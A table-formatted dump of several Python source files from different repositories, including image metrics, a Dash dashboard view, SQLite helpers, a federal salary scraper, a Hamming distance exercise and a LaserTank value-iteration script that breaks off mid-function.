blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b173291f470766a5ebc4fa4b22553f5b3016fa64 | Python | sateodoro/AI604_Team19 | /metric.py | UTF-8 | 1,109 | 2.53125 | 3 | [] | no_license | import numpy
import math
from math import log10
from skimage.measure import compare_ssim as ssim
def to_numpy_array(image):
image = image.cpu()
image = image.data.squeeze(0)
mean = [0.5, 0.5, 0.5]
std = [0.5, 0.5, 0.5]
for t, m, s in zip(image, mean, std):
t.mul_(s).add_(m)
image = image.numpy()
image *= 255.0
return image.clip(0, 255)
def get_psnr(sr_image, ground_truth):
# converting to numpy array
sr_image = to_numpy_array(sr_image)
ground_truth = to_numpy_array(ground_truth)
# psnr computation
mse = ((ground_truth[:, 8:-8,8:-8] - sr_image[:, 8:-8,8:-8]) ** 2).mean()
psnr_val = 10 * log10(255 * 255 / (mse + 10 ** (-10)))
return psnr_val
def get_ssim(sr_image, ground_truth):
# converting to numpy array
sr_image = to_numpy_array(sr_image)
ground_truth = to_numpy_array(ground_truth)
# ssim computation
ssim_val = ssim(np.transpose(ground_truth[:, 8:-8,8:-8],(1,2,0)),
np.transpose(sr_image[:, 8:-8,8:-8],(1,2,0)),
multichannel=True)
return ssim_val | true |
79610af390d985f1c1cbf1d5b450f9d5ef10e4e2 | Python | luiscarlosgph/dash-template | /src/whatever/views/dashboard.py | UTF-8 | 2,390 | 2.84375 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | #!/usr/bin/python
#
# @brief View classes for displaying information on the website.
# @author Luis Carlos Garcia-Peraza Herrera (luiscarlos.gph@gmail.com).
# @date 20 Jan 2020.
import dash_bootstrap_components as dbc
import dash_html_components as html
# My imports
import wat.views.base
class DashboardView(wat.views.base.BaseView):
"""@class that displays the dashboard content (i.e. no navbar)."""
def __init__(self, args):
pass
# TODO: Create controller as an attribute here
def _generate_alert_toast(self, msg='This is an alert toast', show_alert=True):
alert_toast = dbc.Toast(
msg,
id='positioned-toast',
header='Message notification',
is_open=show_alert,
dismissable=True,
icon='info',
# top: 66 positions the toast below the navbar
style={'position': 'fixed', 'top': 66, 'right': 10, 'width': 350},
)
return alert_toast
def _generate_example_toast(self):
example_toast = dbc.Toast(
[
html.P('Sentence 1', className='mb-0'),
html.P('Sentence 2', className='mb-0'),
], header='Window title', style={'maxWidth': '300px'})
return example_toast
def generate_html(self):
# Produce all the different toasts we want
example_toast = self._generate_example_toast()
# Produce container (everything under navbar)
content = dbc.Container(fluid=True, className='mt-3', children=[
dbc.Row([
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
], className='mb-3'),
dbc.Row([
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
dbc.Col(example_toast, width='auto', style={'padding-right': '0px'}),
], className='mb-3'),
self._generate_alert_toast(),
])
return content
if __name__ == '__main__':
raise RuntimeError('[ERROR] This module cannot be run like a script.')
| true |
73ed1fcc9f3c37028ee56a3c6e1fdbcc22ffe237 | Python | ankitjain87/polymath | /utils.py | UTF-8 | 2,272 | 2.921875 | 3 | [] | no_license | import os
import requests
import sqlite3
import config
def is_db_exists():
return True if os.path.isfile(config.DB_NAME) else False
def connect_db():
try:
con = sqlite3.connect(config.DB_NAME)
return con
except Exception as ex:
print("Connection Error", ex)
def is_table_exists(table_name='category'):
try:
con = connect_db()
query = "SELECT name FROM sqlite_master WHERE type='table' AND name='" + table_name + "';"
cursor = con.execute(query)
cursor = cursor.fetchall()
return True if len(cursor) > 0 else False
except Exception as ex:
print("Error in checking if table exists.", ex)
def create_category_table():
try:
con = connect_db()
con.execute(config.CATEGORY_TABLE)
con.close()
except Exception as ex:
print("Error in Category table creation.", ex)
def drop_category_table():
try:
con = connect_db()
con.execute(config.DROP_TABLE)
con.close()
except Exception as ex:
print("Error in Drop Category table.", ex)
def insert_category_data(data):
try:
con = connect_db()
con.executemany(config.INSERT_STMT, data)
con.commit()
con.close()
print("Data inserted successfully.")
except Exception as ex:
print("Error in inserting data in category table.", ex)
def dispatch_http_post_request(end_point, payload, headers):
response = requests.post(end_point, data=payload, headers=headers)
return response
def get_category_data(category_id):
try:
con = connect_db()
stmt = config.SELECT_STMT + 'where category_id=' + str(category_id)
cursor = con.execute(stmt)
data = cursor.fetchall()
con.close()
return data
except Exception as ex:
print('Error while getting data for a category', category_id, ex)
def get_category_children(category_id):
try:
con = connect_db()
stmt = config.SELECT_STMT + 'where parent_id=' + str(category_id)
cursor = con.execute(stmt)
data = cursor.fetchall()
con.close()
return data
except Exception as ex:
print('Error while getting children for a category', category_id, ex)
| true |
1461efc23c4ab267d1b524f341976ee1041058f2 | Python | Zhangzhuzhefu/exercism | /python/hamming/hamming.py | UTF-8 | 170 | 3.328125 | 3 | [] | no_license | def distance(strand_a, strand_b):
if len(strand_a) != len(strand_b):
raise ValueError("ValueError")
return sum([a!=b for a,b in zip(strand_a, strand_b)])
| true |
9a680721170fdd780b5169ce077e3a4041afc510 | Python | smurching/virtualitics-2 | /scrape_fed_salaries.py | UTF-8 | 4,104 | 2.6875 | 3 | [] | no_license | from jinja2 import Template
import psycopg2
import os
import time
import json
import requests
from requests.exceptions import ConnectionError
import logging
import logging.handlers
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.ERROR)
LOG_FILENAME = "log/fed_salary_log.log"
num_display = 20000
TABLE_NAME = "fed.federal_salaries"
YEAR = 2016
base_url = Template('https://www.fedsdatacenter.com/federal-pay-rates/output.php?iDisplayStart={{next_record_start}}&iDisplayLength={{num_display}}')
def setup_logger(file_log=False):
if file_log is True:
l = logging.getLogger()
rotate_file_handler = logging.handlers.RotatingFileHandler(
LOG_FILENAME, maxBytes=1000000, backupCount=100)
f = logging.Formatter('%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')
rotate_file_handler.setFormatter(f)
l.addHandler(rotate_file_handler)
def remove_erroneous_chars(data_to_clean):
chars_to_remove = {'comma': ',', 'dollar': '$'}
logging.debug("Data before cleaning: {}".format(data_to_clean))
separate_change = data_to_clean.split('.')
final_sal = separate_change[0].replace(',', '')
final_sal = final_sal.replace('$', '')
cleaned_data = int(final_sal.replace('.', ''))
logging.debug("Data after cleaning: {}".format(cleaned_data))
return cleaned_data
def clean_data(data):
logging.debug("All the data: {}".format(data))
for i in data:
logging.debug("Current record: {}".format(i))
# Grade
# TODO: More granular grade (some strings some numbers, separate)
# i[1] = int(i[1])
# logging.debug("Grade: {}". format(i[1]))
# Salary
i[3] = remove_erroneous_chars(i[3])
logging.debug("Salary: {}". format(i[3]))
# Bonus
i[4] = remove_erroneous_chars(i[4])
logging.debug("Bonus: {}". format(i[4]))
# Year
i[8] = int(i[8])
logging.debug("Year: {}". format(i[8]))
return data
def get_max_display_record():
never_hit_record_count = 0
# for display have some arbitrary ridiculous number
url = base_url.render(next_record_start=never_hit_record_count, num_display=num_display, year=YEAR)
print url
headers = {'user-agent': 'python personal project app/0.0.1'}
generated_url = requests.get(url, headers=headers)
print generated_url.text
get_data = json.loads(generated_url.text)
get_max_record_count = get_data['iTotalDisplayRecords']
return get_max_record_count
def get_paged_table_data(next_iter):
url = base_url.render(next_record_start=next_iter, num_display=num_display, year=YEAR)
print url
try:
generated_url = requests.get(url)
except ConnectionError as e:
logging.error(e)
time.sleep(300)
logging.error("Trying connecting again after sleep")
generated_url = requests.get(url)
print generated_url.text
get_data = json.loads(generated_url.text)
data = get_data['aaData']
return data
import csv
f = open("data.csv", "a")
writer = csv.writer(f)
import time
def main():
setup_logger(file_log=True)
paging_count = int(get_max_display_record()) / num_display
next_iter = 0
while paging_count > 0:
start = time.time()
logging.info("Start processing data with paging count '{}'".format(paging_count))
raw_data = get_paged_table_data(next_iter)
logging.info("Paged records successfully pulled")
cleaned_data = clean_data(raw_data)
logging.info("Data cleaned!")
#load_data(cleaned_data)
#logging.info("Data with paging count '{}' finished processing!".format(paging_count))
writer.writerows(cleaned_data)
next_iter += num_display
#logging.debug("Next iteration start number: {}".format(next_iter))
print "Next iteration start number: {}".format(next_iter)
paging_count -= 1
# TODO: Add retry
time.sleep(1)
end = time.time()
print(end - start)
if __name__ == "__main__":
main()
| true |
2c54bdd73366cef05e908225230c306f2d287453 | Python | ShuoyuanZhang418/Atificial-Intelligence | /Project-3-LaserTank MDP/GridWorld_VI.py | UTF-8 | 34,360 | 2.984375 | 3 | [] | no_license | import copy
import numpy as np
import random
import time
# Directions
from laser_tank import LaserTankMap
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
def get_action_name(action):
if action == UP:
return "U"
if action == DOWN:
return "D"
if action == LEFT:
return "L"
if action == RIGHT:
return "R"
OBSTACLES = [(1, 1)]
EXIT_STATE = (-1, -1)
class Grid:
def __init__(self):
self.x_size = 4
self.y_size = 3
self.p = 0.8
self.actions = [UP, DOWN, LEFT, RIGHT]
self.rewards = {(3, 1): -100, (3, 2): 1}
self.discount = 0.9
self.states = list((x, y) for x in range(self.x_size) for y in range(self.y_size))
self.states.append(EXIT_STATE)
for obstacle in OBSTACLES:
self.states.remove(obstacle)
def attempt_move(self, s, a):
# s: (x, y), x = s[0], y = s[1]
# a: {UP, DOWN, LEFT, RIGHT}
x, y = s[0], s[1]
# Check absorbing state
if s in self.rewards:
return EXIT_STATE
if s == EXIT_STATE:
return s
# Default: no movement
result = s
# Check borders
"""
Write code here to check if applying an action
keeps the agent with the boundary
"""
if a == LEFT and x > 0:
result = (x - 1, y)
if a == RIGHT and x < self.x_size - 1:
result = (x + 1, y)
if a == UP and y < self.y_size - 1:
result = (x, y + 1)
if a == DOWN and y > 0:
result = (x, y - 1)
# Check obstacle cells
"""
Write code here to check if applying an action
moves the agent into an obstacle cell
"""
if result in OBSTACLES:
return s
return result
def stoch_action(self, a):
# Stochasitc actions probability distributions
if a == RIGHT:
stoch_a = {RIGHT: self.p , UP: (1-self.p)/2, DOWN: (1-self.p)/2}
if a == UP:
stoch_a = {UP: self.p , LEFT: (1-self.p)/2, RIGHT: (1-self.p)/2}
if a == LEFT:
stoch_a = {LEFT: self.p , UP: (1-self.p)/2, DOWN: (1-self.p)/2}
if a == DOWN:
stoch_a = {DOWN: self.p , LEFT: (1-self.p)/2, RIGHT: (1-self.p)/2}
return stoch_a
def get_reward(self, s):
if s == EXIT_STATE:
return 0
if s in self.rewards:
return self.rewards[s]
else:
return 0
class ValueIteration:
def __init__(self, grid):
self.grid = Grid()
self.values = {state: 0 for state in self.grid.states}
def next_iteration(self):
new_values = dict()
"""
Write code here to imlpement the VI value update
Iterate over self.grid.states and self.grid.actions
Use stoch_action(a) and attempt_move(s,a)
"""
for s in self.grid.states:
# Maximum value
action_values = list()
for a in self.grid.actions:
total = 0
for stoch_action, p in self.grid.stoch_action(a).items():
# Apply action
s_next = self.grid.attempt_move(s, stoch_action)
total += p * (self.grid.get_reward(s) + (self.grid.discount * self.values[s_next]))
action_values.append(total)
# Update state value with maximum
new_values[s] = max(action_values)
self.values = new_values
def print_values(self):
for state, value in self.values.items():
print(state, value)
def run_value_iteration():
grid = Grid
vi = ValueIteration(grid)
start = time.time()
print("Initial values:")
vi.print_values()
print()
max_iter = 100
for i in range(max_iter):
vi.next_iteration()
print("Values after iteration", i + 1)
vi.print_values()
print()
end = time.time()
print("Time to copmlete", max_iter, "VI iterations")
print(end - start)
def transition_vi_pi(self, game_map, move):
action_reward = 0
action_value = 0
next_wrong_ys = []
next_wrong_xs = []
if move == LaserTankMap.MOVE_FORWARD:
# get coordinates for next cell
if game_map.player_heading == LaserTankMap.UP:
next_y = game_map.player_y - 1
next_x = game_map.player_x
if next_y < 1:
action_reward += game_map.collision_cost * game_map.t_success_prob
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_success_prob
else:
this_action_reward, this_action_value = self.get_reward_value(
game_map, next_y, next_x, game_map.player_heading)
action_reward += this_action_reward * game_map.t_success_prob
action_value += this_action_value * game_map.t_success_prob
if game_map.player_y - 1 < 1 or game_map.player_x - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_y - 1 < 1 or game_map.player_x + 1 >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x + 1)
if game_map.player_y < 1 or game_map.player_x - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_y < 1 or game_map.player_x + 1 >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x + 1)
if game_map.player_y < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x)
elif game_map.player_heading == LaserTankMap.DOWN:
next_y = game_map.player_y + 1
next_x = game_map.player_x
if next_y >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_success_prob
action_value += \
self.values[game_map.player_x - 1][
game_map.player_y - 1][
game_map.player_heading] * game_map.t_success_prob
else:
this_action_reward, this_action_value = self.get_reward_value(
game_map, next_y, next_x, game_map.player_heading)
action_reward += this_action_reward * game_map.t_success_prob
action_value += this_action_value * game_map.t_success_prob
if game_map.player_y + 1 >= game_map.y_size - 1 or game_map.player_x - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_y + 1 >= game_map.y_size - 1 or game_map.player_x + 1 >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x + 1)
if game_map.player_y >= game_map.y_size - 1 or game_map.player_x - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_y >= game_map.y_size - 1 or game_map.player_x + 1 >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x + 1)
if game_map.player_y >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x)
elif game_map.player_heading == LaserTankMap.LEFT:
next_y = game_map.player_y
next_x = game_map.player_x - 1
if next_x < 1:
action_reward += game_map.collision_cost * game_map.t_success_prob
action_value += \
self.values[game_map.player_x - 1][
game_map.player_y - 1][
game_map.player_heading] * game_map.t_success_prob
else:
this_action_reward, this_action_value = self.get_reward_value(
game_map, next_y, next_x, game_map.player_heading)
action_reward += this_action_reward * game_map.t_success_prob
action_value += this_action_value * game_map.t_success_prob
if game_map.player_x - 1 < 1 or game_map.player_y - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_x - 1 < 1 or game_map.player_y + 1 >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x - 1)
if game_map.player_x < 1 or game_map.player_y - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x)
if game_map.player_x < 1 or game_map.player_y + 1 >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x)
if game_map.player_x < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x)
else:
next_y = game_map.player_y
next_x = game_map.player_x + 1
if next_x >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_success_prob
action_value += \
self.values[game_map.player_x - 1][
game_map.player_y - 1][
game_map.player_heading] * game_map.t_success_prob
else:
this_action_reward, this_action_value = self.get_reward_value(
game_map, next_y, next_x, game_map.player_heading)
action_reward += this_action_reward * game_map.t_success_prob
action_value += this_action_value * game_map.t_success_prob
if next_x + 1 >= game_map.x_size - 1 or game_map.player_y - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x + 1)
if next_x + 1 >= game_map.x_size - 1 or game_map.player_y + 1 >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x + 1)
if next_x >= game_map.x_size - 1 or game_map.player_y - 1 < 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y - 1)
next_wrong_xs.append(game_map.player_x)
if next_x >= game_map.x_size - 1 or game_map.player_y + 1 >= game_map.y_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y + 1)
next_wrong_xs.append(game_map.player_x)
if next_x >= game_map.x_size - 1:
action_reward += game_map.collision_cost * game_map.t_error_prob * (
1 / 5)
action_value += \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading] * game_map.t_error_prob * (
1 / 5)
else:
next_wrong_ys.append(game_map.player_y)
next_wrong_xs.append(game_map.player_x)
for i in range(len(next_wrong_ys)):
this_action_reward, this_action_value = self.get_reward_value(
game_map, next_wrong_ys[i], next_wrong_xs[i],
game_map.player_heading)
action_reward += this_action_reward * game_map.t_error_prob * (
1 / 5)
action_value += this_action_value * game_map.t_error_prob * (
1 / 5)
elif move == LaserTankMap.TURN_LEFT:
# no collision or game over possible
if game_map.player_heading == LaserTankMap.UP:
game_map.player_heading = LaserTankMap.LEFT
elif game_map.player_heading == LaserTankMap.DOWN:
game_map.player_heading = LaserTankMap.RIGHT
elif game_map.player_heading == LaserTankMap.LEFT:
game_map.player_heading = LaserTankMap.DOWN
else:
game_map.player_heading = LaserTankMap.UP
if LaserTankMap.cell_is_game_over(game_map, game_map.player_y,
game_map.player_x):
action_reward = game_map.game_over_cost
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
elif game_map.grid_data[game_map.player_y][
game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
action_reward = game_map.goal_reward
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
else:
action_reward = game_map.move_cost
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
elif move == LaserTankMap.TURN_RIGHT:
# no collision or game over possible
if game_map.player_heading == LaserTankMap.UP:
game_map.player_heading = LaserTankMap.RIGHT
elif game_map.player_heading == LaserTankMap.DOWN:
game_map.player_heading = LaserTankMap.LEFT
elif game_map.player_heading == LaserTankMap.LEFT:
game_map.player_heading = LaserTankMap.UP
else:
game_map.player_heading = LaserTankMap.DOWN
if LaserTankMap.cell_is_game_over(game_map, game_map.player_y,
game_map.player_x):
action_reward = game_map.game_over_cost
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
elif game_map.grid_data[game_map.player_y][
game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
action_reward = game_map.goal_reward
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
else:
action_reward = game_map.move_cost
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
game_map.player_heading]
# elif move == self.SHOOT_LASER:
# # set laser direction
# if map.player_heading == LaserTankMap.UP:
# heading = LaserTankMap.UP
# dy, dx = (-1, 0)
# elif map.player_heading == LaserTankMap.DOWN:
# heading = LaserTankMap.DOWN
# dy, dx = (1, 0)
# elif map.player_heading == LaserTankMap.LEFT:
# heading = LaserTankMap.LEFT
# dy, dx = (0, -1)
# else:
# heading = LaserTankMap.RIGHT
# dy, dx = (0, 1)
#
# # loop until laser blocking object reached
# ly, lx = (map.player_y, map.player_x)
# while True:
# ly += dy
# lx += dx
#
# # handle boundary and immovable obstacles
# if ly < 0 or ly >= map.y_size or \
# lx < 0 or lx >= map.x_size or \
# map.grid_data[ly][lx] == self.OBSTACLE_SYMBOL:
# # laser stopped without effect
# return map.move_cost
#
# # handle movable objects
# elif self.cell_is_laser_movable(ly, lx, heading):
# # check if tile can be moved without collision
# if self.cell_is_blocked(ly + dy, lx + dx) or \
# map.grid_data[ly + dy][
# lx + dx] == LaserTankMap.ICE_SYMBOL or \
# map.grid_data[ly + dy][
# lx + dx] == LaserTankMap.TELEPORT_SYMBOL or \
# map.grid_data[ly + dy][
# lx + dx] == LaserTankMap.FLAG_SYMBOL or \
# (
# ly + dy == map.player_y and lx + dx == map.player_x):
# # tile cannot be moved
# return map.move_cost
# else:
# old_symbol = map.grid_data[ly][lx]
# map.grid_data[ly][lx] = LaserTankMap.LAND_SYMBOL
# if map.grid_data[ly + dy][
# lx + dx] == LaserTankMap.WATER_SYMBOL:
# # if new bridge position is water, convert to land tile
# if old_symbol == self.BRIDGE_SYMBOL:
# map.grid_data[ly + dy][
# lx + dx] = LaserTankMap.LAND_SYMBOL
# # otherwise, do not replace the old symbol
# else:
# # otherwise, move the tile forward
# map.grid_data[ly + dy][lx + dx] = old_symbol
# break
#
# # handle bricks
# elif map.grid_data[ly][lx] == self.BRICK_SYMBOL:
# # remove brick, replace with land
# map.grid_data[ly][lx] = LaserTankMap.LAND_SYMBOL
# break
#
# # handle facing anti-tanks
# elif (map.grid_data[ly][
# lx] == self.ANTI_TANK_UP_SYMBOL and heading == LaserTankMap.DOWN) or \
# (map.grid_data[ly][
# lx] == self.ANTI_TANK_DOWN_SYMBOL and heading == LaserTankMap.UP) or \
# (map.grid_data[ly][
# lx] == self.ANTI_TANK_LEFT_SYMBOL and heading == LaserTankMap.RIGHT) or \
# (map.grid_data[ly][
# lx] == self.ANTI_TANK_RIGHT_SYMBOL and heading == LaserTankMap.LEFT):
# # mark anti-tank as destroyed
# map.grid_data[ly][lx] = self.ANTI_TANK_DESTROYED_SYMBOL
# break
#
# # handle player laser collision
# elif ly == map.player_y and lx == map.player_x:
# return map.game_over_cost
#
# # handle facing mirrors
# elif (map.grid_data[ly][
# lx] == self.MIRROR_UL_SYMBOL and heading == LaserTankMap.RIGHT) or \
# (map.grid_data[ly][
# lx] == self.MIRROR_UR_SYMBOL and heading == LaserTankMap.LEFT):
# # new direction is up
# dy, dx = (-1, 0)
# heading = LaserTankMap.UP
# elif (map.grid_data[ly][
# lx] == self.MIRROR_DL_SYMBOL and heading == LaserTankMap.RIGHT) or \
# (map.grid_data[ly][
# lx] == self.MIRROR_DR_SYMBOL and heading == LaserTankMap.LEFT):
# # new direction is down
# dy, dx = (1, 0)
# heading = LaserTankMap.DOWN
# elif (map.grid_data[ly][
# lx] == self.MIRROR_UL_SYMBOL and heading == LaserTankMap.DOWN) or \
# (map.grid_data[ly][
# lx] == self.MIRROR_DL_SYMBOL and heading == LaserTankMap.UP):
# # new direction is left
# dy, dx = (0, -1)
# heading = LaserTankMap.LEFT
# elif (map.grid_data[ly][
# lx] == self.MIRROR_UR_SYMBOL and heading == LaserTankMap.DOWN) or \
# (map.grid_data[ly][
# lx] == self.MIRROR_DR_SYMBOL and heading == LaserTankMap.UP):
# # new direction is right
# dy, dx = (0, 1)
# heading = LaserTankMap.RIGHT
# # do not terminate laser on facing mirror - keep looping
#
# # check for game over condition after effect of laser
# if self.cell_is_game_over(map.player_y, map.player_x):
# return map.game_over_cost
return action_reward + action_value * game_map.gamma
def get_reward_value(self, game_map, next_y, next_x, next_heading):
# handle special tile types
if game_map.grid_data[next_y][next_x] == LaserTankMap.ICE_SYMBOL:
# handle ice tile - slide until first non-ice tile or blocked
if game_map.player_heading == LaserTankMap.UP:
for i in range(next_y, -1, -1):
if game_map.grid_data[i][next_x] != LaserTankMap.ICE_SYMBOL:
if game_map.grid_data[i][
next_x] == LaserTankMap.WATER_SYMBOL:
# slide into water - game over
action_reward = game_map.game_over_cost
action_value = self.values[next_x - 1][i - 1][
next_heading]
return action_reward, action_value
elif LaserTankMap.cell_is_blocked(game_map, i, next_x):
# if blocked, stop on last ice cell
next_y = i + 1
break
else:
next_y = i
break
elif game_map.player_heading == LaserTankMap.DOWN:
for i in range(next_y, game_map.y_size):
if game_map.grid_data[i][
next_x] != LaserTankMap.ICE_SYMBOL:
if game_map.grid_data[i][
next_x] == LaserTankMap.WATER_SYMBOL:
# slide into water - game over
action_reward = game_map.game_over_cost
action_value = self.values[next_x - 1][i - 1][
next_heading]
return action_reward, action_value
elif LaserTankMap.cell_is_blocked(game_map, i,
next_x):
# if blocked, stop on last ice cell
next_y = i - 1
break
else:
next_y = i
break
elif game_map.player_heading == LaserTankMap.LEFT:
for i in range(next_x, -1, -1):
if game_map.grid_data[next_y][i] != LaserTankMap.ICE_SYMBOL:
if game_map.grid_data[next_y][
i] == LaserTankMap.WATER_SYMBOL:
# slide into water - game over
action_reward = game_map.game_over_cost
action_value = self.values[i - 1][next_y - 1][
next_heading]
return action_reward, action_value
elif LaserTankMap.cell_is_blocked(game_map, next_y, i):
# if blocked, stop on last ice cell
next_x = i + 1
break
else:
next_x = i
break
else:
for i in range(next_x, game_map.x_size):
if game_map.grid_data[next_y][i] != LaserTankMap.ICE_SYMBOL:
if game_map.grid_data[next_y][
i] == LaserTankMap.WATER_SYMBOL:
# slide into water - game over
action_reward = game_map.game_over_cost
action_value = self.values[i - 1][next_y - 1][
next_heading]
return action_reward, action_value
elif LaserTankMap.cell_is_blocked(game_map, next_y, i):
# if blocked, stop on last ice cell
next_x = i - 1
break
else:
next_x = i
break
if game_map.grid_data[next_y][next_x] == LaserTankMap.TELEPORT_SYMBOL:
# handle teleport - find the other teleporter
tpy, tpx = (None, None)
for i in range(game_map.y_size):
for j in range(game_map.x_size):
if game_map.grid_data[i][
j] == LaserTankMap.TELEPORT_SYMBOL and i != next_y and j != next_x:
tpy, tpx = (i, j)
break
if tpy is not None:
break
if tpy is None:
raise Exception(
"LaserTank Map Error: Unmatched teleport symbol")
next_y, next_x = (tpy, tpx)
else:
